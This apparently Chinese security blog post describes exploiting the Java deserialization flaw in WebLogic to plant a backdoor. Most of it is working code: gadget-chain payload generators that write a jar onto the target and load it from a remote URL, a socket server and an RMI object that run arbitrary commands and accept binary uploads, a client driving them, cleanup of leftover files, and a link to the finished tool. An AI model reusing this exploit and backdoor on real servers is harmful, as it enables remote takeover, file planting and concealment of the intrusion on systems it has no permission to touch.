

0x00 简介

Java反序列化漏洞由来已久,在WebLogic和JBoss等著名服务器上都曝出存在此漏洞。FoxGlove Security安全团队的breenmachine给出了详细的分析,但没有给出更近一步的利用方式。前段时间rebeyond在不需要连接公网的情况下使用RMI的方式在WebLogic上实现了文本文件上传和命令执行,但没有实现二进制文件上传。我通过使用Socket的方式实现了二进制文件上传和命令执行,同时也实现了RMI方式的二进制文件。

0x01 思路


  1. 本地创建Socket实现的迷你服务器类并导出jar包
  2. 把jar包上传至目标服务器
  3. 启动目标服务器上的迷你服务器
  4. 使用二进制文件上传和命令执行功能
  5. 发送关闭请求,清理目标服务器残留文件

0x02 实现


#!java public class Server {      /**      * 启动服务器      * @param port      * @param path      */     public static void start(int port, String path) {         ServerSocket server = null;         Socket client = null;         InputStream input = null;         OutputStream out = null;         Runtime runTime = Runtime.getRuntime();         try {             server = new ServerSocket(port);             // 0表示功能模式 1表示传输模式             int opcode = 0;             int len = 0;             byte[] data = new byte[100 * 1024];             String uploadPath = "";             boolean isUploadStart = false;             client = server.accept();             input = client.getInputStream();             out = client.getOutputStream();             byte[] overData = { 0, 0, 0, 6, 6, 6, 8, 8, 8 };             while (true) {                 len = input.read(data);                 if (len != -1) {                     if (opcode == 0) {                         // 功能模式                         String operation = new String(data, 0, len);                         String[] receive = operation.split(":::");                         if ("bye".equals(receive[0])) {                             // 断开连接 关闭服务器                             out.write("success".getBytes());                             out.flush();                             FileOutputStream outputStream = new FileOutputStream(path);                             // 清理残留文件                             outputStream.write("".getBytes());                             outputStream.flush();                             outputStream.close();                             break;                         } else if ("cmd".equals(receive[0])) {                             // 执行命令 返回结果                             try {                                 Process proc = runTime.exec(receive[1]);                                 InputStream in = proc.getInputStream();                                 byte[] procData = new byte[1024];                                 byte[] total = new byte[0];                                 int procDataLen = 0;                                 while ((procDataLen = in.read(procData)) != -1) {                                     byte[] temp = new byte[procDataLen];                                     for (int i = 0; i < procDataLen; i++) {                                         temp[i] = procData[i];                                     }                                     total = byteMerger(total, temp);                                 }                                 if (total.length == 0) {                                     out.write("error".getBytes());                                 } else {                                     out.write(total);                                 }                                 out.flush();                             } catch (Exception e) {                                 e.printStackTrace();                                 out.write("error".getBytes());                                 out.flush();                             }                         } else if ("upload".equals(receive[0])) {                             // 切换成传输模式                             uploadPath = receive[1];                             isUploadStart = true;                             opcode = 1;                         }                     } else if (opcode == 1) {                         // 传输模式                         byte[] receive = new byte[len];                         for (int i = 0; i < len; i++) {                             receive[i] = data[i];                         }                         if (Arrays.equals(overData, receive)) {                             // 传输结束切换成功能模式                             isUploadStart = false;                             opcode = 0;                         } else {                             // 分块接收                             FileOutputStream outputStream = null;                             if (isUploadStart) {                                 // 接收文件的开头部分                                 outputStream = new FileOutputStream(uploadPath, false);                                 outputStream.write(receive);                                 isUploadStart = false;                             } else {                                 // 接收文件的结束部分                                 outputStream = new FileOutputStream(uploadPath, true);                                 outputStream.write(receive);                             }                             outputStream.close();                         }                     }                 } else {                     Thread.sleep(1000);                 }             }         } catch (Exception e) {             e.printStackTrace();             try {                 out.write("error".getBytes());                 out.flush();             } catch (IOException e1) {                 e1.printStackTrace();             }         } finally {             try {                 client.close();                 server.close();             } catch (IOException e) {                 e.printStackTrace();             }         }     }      /**      * 合并字节数组      * @param byte_1      * @param byte_2      * @return 合并后的数组      */     private static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {         byte[] byte_3 = new byte[byte_1.length + byte_2.length];         System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);         System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);         return byte_3;     }  } 



这里我要特别说明一点,breenmachine在介绍WebLogic漏洞利用时特别说明了需要计算Payload的长度,但是我看到过的国内文章没有一篇提到这一点,给出的利用代码中的Payload长度值写的都是原作者的 09f3 ,我觉得这也是导致漏洞利用失败的主要原因之一,因此发送Payload前最好计算下长度。

A very important point about the first chunk of the payload. Notice the first 4 bytes “00 00 09 f3”. The “09 f3” is the specification for the TOTAL payload length in bytes.


  1. poc访问指定url:0x0000-0x1e39
  2. 反弹shell:0x000-0x2049
  3. 执行命令calc.exe:0x0000-0x1d38


#!java public static byte[] generateServerPayload(String remotePath) throws Exception {     final Transformer[] transformers = new Transformer[] {             new ConstantTransformer(FileOutputStream.class),             new InvokerTransformer("getConstructor",                     new Class[] { Class[].class },                     new Object[] { new Class[] { String.class } }),             new InvokerTransformer("newInstance",                     new Class[] { Object[].class },                     new Object[] { new Object[] { remotePath } }),             new InvokerTransformer("write", new Class[] { byte[].class },                     new Object[] { Utils.hexStringToBytes(SERVER_JAR) }),             new ConstantTransformer(1) };     return generateObject(transformers); } 




#!java public static byte[] generateStartPayload(String remoteClassPath, String remotePath, int port) throws Exception {     final Transformer[] transformers = new Transformer[] {             new ConstantTransformer(URLClassLoader.class),             new InvokerTransformer("getConstructor",                     new Class[] { Class[].class },                     new Object[] { new Class[] { URL[].class } }),             new InvokerTransformer("newInstance",                     new Class[] { Object[].class },                     new Object[] { new Object[] { new URL[] { new URL(remoteClassPath) } } }),             new InvokerTransformer("loadClass",                     new Class[] { String.class },                     new Object[] { "org.heysec.exp.Server" }),             new InvokerTransformer("getMethod",                     new Class[] { String.class, Class[].class },                     new Object[] { "start", new Class[] { int.class, String.class } }),             new InvokerTransformer("invoke",                     new Class[] { Object.class, Object[].class },                     new Object[] { null, new Object[] { port, remotePath } }) };     return generateObject(transformers); } 




#!java public class Client {     public static void main(String[] args) {         Socket client = null;         InputStream input = null;         OutputStream output = null;         FileInputStream fileInputStream = null;         try {             int len = 0;             byte[] receiveData = new byte[5 * 1024];             byte[] sendData = new byte[100 * 1024];             int sendLen = 0;             byte[] overData = { 0, 0, 0, 6, 6, 6, 8, 8, 8 };              // 创建客户端Socket             client = new Socket("", 8080);             input = client.getInputStream();             output = client.getOutputStream();              // 发送准备上传文件命令使服务器切换到传输模式             output.write("upload:::test.zip".getBytes());             output.flush();             Thread.sleep(1000);              // 分块传输文件             fileInputStream = new FileInputStream("F:/安全集/tools/BurpSuite_pro_v1.6.27.zip");             sendLen = fileInputStream.read(sendData);             if (sendLen != -1) {                 output.write(Arrays.copyOfRange(sendData, 0, sendLen));                 output.flush();                 Thread.sleep(1000);                 while ((sendLen = fileInputStream.read(sendData)) != -1) {                     output.write(Arrays.copyOfRange(sendData, 0, sendLen));                     output.flush();                 }             }             Thread.sleep(1000);              // 发送文件上传结束命令             output.write(overData);             output.flush();             Thread.sleep(1000);              // 执行命令             output.write("cmd:::cmd /c dir".getBytes());             output.flush();             Thread.sleep(1000);              // 接收返回结果             len = input.read(receiveData);             String result = new String(receiveData, 0, len, "GBK");             System.out.println(result);             Thread.sleep(1000);              // 关闭服务器             output.write("bye".getBytes());             output.flush();             Thread.sleep(1000);              len = input.read(receiveData);             System.out.println(new String(receiveData, 0, len));         } catch (Exception e) {             e.printStackTrace();         } finally {             try {                 fileInputStream.close();                 client.close();             } catch (Exception e) {                 e.printStackTrace();             }          }     } } 

测试结果1 WebLogic之Java反序列化漏洞利用实现二进制文件上传和命令执行

测试结果2 WebLogic之Java反序列化漏洞利用实现二进制文件上传和命令执行

5. 发送关闭请求清理残留文件


#!java output.write("bye".getBytes()); output.flush(); 


#!java if ("bye".equals(receive[0])) {     // 断开连接 关闭服务器     out.write("success".getBytes());     out.flush();     FileOutputStream outputStream = new FileOutputStream(path);     // 清理残留文件     outputStream.write("".getBytes());     outputStream.flush();     outputStream.close();     break; } 


0x03 RMI方式实现二进制文件上传及优化流程



#!java public class RemoteObjectImpl implements RemoteObject {      /**      * 分块上传文件      */     public boolean upload(String uploadPath, byte[] data, boolean append) {         FileOutputStream out = null;         try {             out = new FileOutputStream(uploadPath, append);             out.write(data);             return true;         } catch (Exception e) {             e.printStackTrace();             return false;         } finally {             try {                 out.close();             } catch (Exception e) {                 e.printStackTrace();                 return false;             }         }     }      /**      * 执行命令      */     public String exec(String cmd) {         try {             Process proc = Runtime.getRuntime().exec(cmd);             BufferedReader br = new BufferedReader(new InputStreamReader(                     proc.getInputStream()));             StringBuffer sb = new StringBuffer();             String line;             String result;             while ((line = br.readLine()) != null) {                 sb.append(line).append("/n");             }             result = sb.toString();             if ("".equals(result)) {                 return "error";             } else {                 return result;             }         } catch (Exception e) {             e.printStackTrace();             return "error";         }     }      /**      * 反注册远程类并清除残留文件      */     public void unbind(String path) {         try {             Context ctx = new InitialContext();             ctx.unbind("RemoteObject");         } catch (Exception e) {             e.printStackTrace();         }         FileOutputStream out = null;         File file = null;         try {             file = new File(path);             out = new FileOutputStream(file);             out.write("".getBytes());         } catch (Exception e) {             e.printStackTrace();         } finally {             try {                 out.close();             } catch (Exception e) {                 e.printStackTrace();             }         }      }      /**      * 注册远程类      */     public static void bind() {         try {             RemoteObjectImpl remote = new RemoteObjectImpl();             Context ctx = new InitialContext();             ctx.bind("RemoteObject", remote);         } catch (Exception e) {             e.printStackTrace();         }     } } 


0x04 Socket VS RMI

VS Socket RMI
端口 需要额外端口可能被防火墙拦截 使用WebLogic本身端口
传输速率 通过Socket字节流较快 通过远程过程调用较慢

0x05 总结


Socket利用方式 WebLogic之Java反序列化漏洞利用实现二进制文件上传和命令执行

RMI利用方式 WebLogic之Java反序列化漏洞利用实现二进制文件上传和命令执行

下载链接: http://pan.baidu.com/s/1pKuR9GJ 密码:62x4

0x06 参考链接
